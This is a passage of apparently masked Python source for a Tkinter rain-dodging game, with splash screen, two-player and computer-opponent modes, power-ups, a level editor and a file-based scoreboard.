225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\n<mask token>\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\n<mask token>\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\n<mask token>\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) 
Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, 
data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + 
data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\n<mask token>\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\n<mask token>\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n 
canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n 
data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\n<mask token>\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\n<mask token>\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! 
Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\n<mask token>\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = 
data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\n<mask token>\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if 
data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\n<mask token>\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n 
drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if (data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\n<mask token>\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n addPowerUpsAI(data)\n\n\n<mask token>\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != 
True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\n<mask token>\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\n<mask token>\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 
23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in 
data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\n<mask token>\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 
225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\ndef mousePressed(event, data):\n if data.mode == 'splashScreen':\n splashScreenMousePressed(event, data)\n elif data.mode == '1Player':\n playerMousePressed(event, data)\n elif data.mode == '2Player':\n twoPlayerMousePressed(event, data)\n elif data.mode == 'editor':\n editorMousePressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedMousePressed(event, data)\n elif data.mode == 'AI':\n AIMousePressed(event, data)\n elif data.mode == 'difficulty':\n difficultyMousePressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardMousePressed(event, data)\n elif data.mode == 'help':\n helpMousePressed(event, data)\n\n\n<mask token>\n\n\ndef timerFired(data):\n if data.mode == 'splashScreen':\n splashScreenTimerFired(data)\n elif data.mode == '1Player':\n playerTimerFired(data)\n elif data.mode == '2Player':\n twoPlayerTimerFired(data)\n elif data.mode == 'editor':\n editorTimerFired(data)\n elif data.mode == 'levelCreated':\n levelCreatedTimerFired(data)\n elif data.mode == 'AI':\n AITimerFired(data)\n elif data.mode == 'difficulty':\n difficultyTimerFired(data)\n elif data.mode == 'scoreboard':\n scoreboardTimerFired(data)\n elif data.mode == 'help':\n helpTimerFired(data)\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n 
scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\n<mask token>\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\ndef splashScreenButtons(canvas, data):\n canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1)\n canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2)\n canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3)\n canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4)\n canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5)\n canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6\n )\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) 
